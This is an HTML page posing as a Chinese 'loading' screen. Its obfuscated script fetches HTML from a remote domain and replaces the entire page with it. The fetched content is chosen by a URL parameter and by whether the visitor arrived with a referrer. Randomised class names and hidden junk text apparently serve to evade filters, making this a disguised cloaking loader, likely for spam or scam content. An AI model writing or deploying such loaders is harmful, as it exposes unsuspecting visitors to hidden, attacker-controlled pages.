<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ja0odMYfi {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ja0odMYfi .XFTvfnJMjVo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ja0odMYfi .content {
            line-height: 50px;
            text-align: center
        }

        .Ja0odMYfi .img {
            width: 100%
        }

        .Ja0odMYfi .HiysuH {
            text-align: center
        }

        .Ja0odMYfi .HiysuH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ja0odMYfi .HiysuH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ja0odMYfi .HiysuH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ja0odMYfi .HiysuH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ja0odMYfi .HiysuH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ja0odMYfi .HiysuH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ja0odMYfi .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YpzhAXBhF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xGAEG = YpzhAXBhF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xGAEG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xGAEG +".html?a=share";
		}
		
        PVIaYMH0zE=url+"#"+new Date().getTime();
        PVIaYMH0zE && function() {
            $.get(PVIaYMH0zE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>DFPrIeWUlN3xymYD4irT4eSWEFsCgYna5MxYpL2YAeE96zNdBqflMSdY6YV1GiHyGR2b</p>
<li style='display:none' >XMuVuz0ynAyVz16kQniZUB0yzqiAGyLZ2FVFjo0kEU</li>
<b style='display:none' >IR3U907fLDlBDHah5JgGke1HhM2iOrfqFum8tj4SKP1i2vmVBoqxVWi1j2Hz6tT8v</b><div class="Ja0odMYfi">
    <div class="XFTvfnJMjVo">
        <div class="HiysuH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >wSU73h7uNxoKk99mXoxVty25g68ascUUJH2deoSV</b>
<h1 style='display:none' >pnbUc8ZAPqny0OC5dyNdMcdfQa4Rm0NvRopcwR</h1>
<p  style='display:none'>JcNVycjyMNypvGiQ8ayPjy</p>
<h1 style='display:none' >pnbUc8ZAPqny0OC5dyNdMcdfQa4Rm0NvRopcwR</h1></body>
</html>